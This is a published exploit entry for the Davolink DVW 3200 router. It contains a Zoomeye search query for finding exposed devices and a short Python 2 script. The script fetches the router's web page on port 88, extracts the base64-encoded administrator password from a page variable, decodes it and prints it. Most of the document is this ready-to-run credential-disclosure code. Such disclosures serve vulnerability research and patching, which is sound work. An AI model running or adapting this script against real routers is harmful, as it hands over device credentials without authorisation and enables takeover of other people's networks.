# Exploit Title: Davolink DVW 3200 Router - Password Disclosure
# Google Dork: N/A
# Zoomeye dork : https://www.zoomeye.org/searchResult?q=%22var%20user_passwd%22%20%2Bapp%3A%22DAVOLINK%20GAPD-7000%20WAP%20httpd%22
# Date: 2018-07-13
# Exploit Author: Ankit Anubhav
# Vendor Homepage: www.davolink.co.kr
# Software Link: N/A
# Version: DVW 3200
# Tested on: Python 2.7 Windows 10
# CVE : N/A
# Many Davolink Davolink DV 3200 devices credentials can be disclosed using the following script.
# Author : Ankit Anubhav (ankitanubhav.com) of NewSky Security ( https://www.newskysecurity.com/ )
# Usage script.py 1.3.3.7 where 1.3.3.7 is the Davolink DV 3200 IP.
# Use responsibly only for research and testing purposes.
# Tested with python 2.7
import sys
import urllib2
import re
import base64
def davolink_credfinder(ip):
try:
req = urllib2.Request('http://' + ip + ':' + '88', headers={ 'User-Agent': 'Mozilla/5.0' })
connection_check = str(urllib2.urlopen(req).getcode())
if (connection_check == "200"):
html = urllib2.urlopen(req).read()
str_html = str(html)
m=re.compile('var user\_passwd\=\"(.*?)\"').search(str_html)
encoded_pwd =str(m.group(1))
actual_pwd = base64.b64decode(encoded_pwd)
print "**************************************************************************************************"
print "The password for the Davolink device is " + actual_pwd
print "**************************************************************************************************"
else:
print "Connection to port 88 was not successful. Cant find credentials,sorry."
except:
print "There was an error in connecting to the IP."
davolink_credfinder(sys.argv[1])